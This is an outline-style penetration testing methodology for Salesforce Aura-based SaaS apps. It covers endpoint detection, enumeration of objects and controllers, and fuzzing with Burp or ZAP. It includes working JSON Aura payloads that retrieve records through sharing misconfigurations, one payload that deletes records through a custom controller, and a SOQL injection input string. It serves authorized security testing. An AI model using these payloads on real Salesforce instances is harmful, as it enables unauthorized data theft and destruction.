Salesforce SAAS Apps Hacking
Preparation Phase
Gather Tools
Burp Suite or OWASP ZAP
HTTP Request/Response Interceptor
Set Up Environment
Configure Burp/ZAP with browser
Ensure target Salesforce application is accessible
Pre-Check
Identify Salesforce Technologies
Browse application via Burp/ZAP and check HTTP History for paths:
/s/sfsites/aura
/aura
/sfsites/aura
In Repeater, make a POST request to the paths and check for response patterns:
"actions":[
aura:clientOutOfSync
aura:invalidSession
Reconnaissance
Identify Standard Objects
Retrieve list of standard objects from Salesforce documentation
Save to
objects.txt
Identify Custom Objects
Look for objects ending in
__c
Use
getObjectInfo
andgetHostConfig
actionsAdd to
objects.txt
Identify Standard Controllers and Actions
Inspect
app.js
andaura_prod.js
filesGrep for
componentService.initControllerDefs([{
patternSave identified controllers and actions
Identify Custom Controllers and Actions
Inspect JS files and HTTP requests
Look for custom controllers starting with
apex://
Save identified controllers and actions
Fuzzing
Set Up Fuzzing in Burp/ZAP
Send POST request with Aura endpoint to Repeater
Replace
message
parameter with different optionsUse Intruder to fuzz with
objects.txt
Fuzzing Actions
getObjectInfo
Payload:
{"actions":[{"id":"1;a","descriptor":"aura://RecordUiController/ACTION$getObjectInfo","params":{"objectApiName":"***"}}]}
getConfigData
Payload:
{"actions":[{"id":"1;a","descriptor":"aura://HostConfigController/ACTION$getConfigData","params":{}}]}
getListsByObjectName
Payload:
{"actions":[{"id":"1;a","descriptor":"aura://ListUiController/ACTION$getListsByObjectName","params":{"objectApiName":"***"}}]}
Retrieving Sensitive Information
Check for Org-Wide Sharing Misconfigurations
Use
getItems
action to retrieve recordsPayload:
{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems","params":{"entityNameOrId":"***","layoutType":"FULL","pageSize":100,"currentPage":0}}]}
Use
getRecord
action to retrieve specific recordsPayload:
{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$getRecord","params":{"recordId":"***"}}]}
Check for Custom Controller Misconfigurations
Identify custom actions like
getSalesData
anddeleteSalesDataById
Payload for retrieving data:
{"actions":[{"id":"1;a","descriptor":"apex://New_Sales_Controller/ACTION$getSalesData","params":{}}]}
Payload for deleting data:
{"actions":[{"id":"1;a","descriptor":"apex://New_Sales_Controller/ACTION$deleteSalesDataById","params":{"id":"***"}}]}
SOQL Injection
Identify Potential Injection Points
Inspect HTTP requests for SOQL queries
Craft Injection Payloads
User input:
name=test%') OR (Name LIKE '
Expected vulnerable query:
SELECT Id FROM Contact WHERE (IsDeleted = false AND Name LIKE '%test%') OR (Name LIKE '%')
Documentation and Reporting
Document Findings
Note each identified object, controller, and action
Record fuzzing results and any sensitive data retrieved
Detail any successful SOQL injections and their impact
Create a Comprehensive Report
Executive summary of findings
Detailed methodology and steps taken
Screenshots and evidence of vulnerabilities
Recommendations for remediation
References
Last updated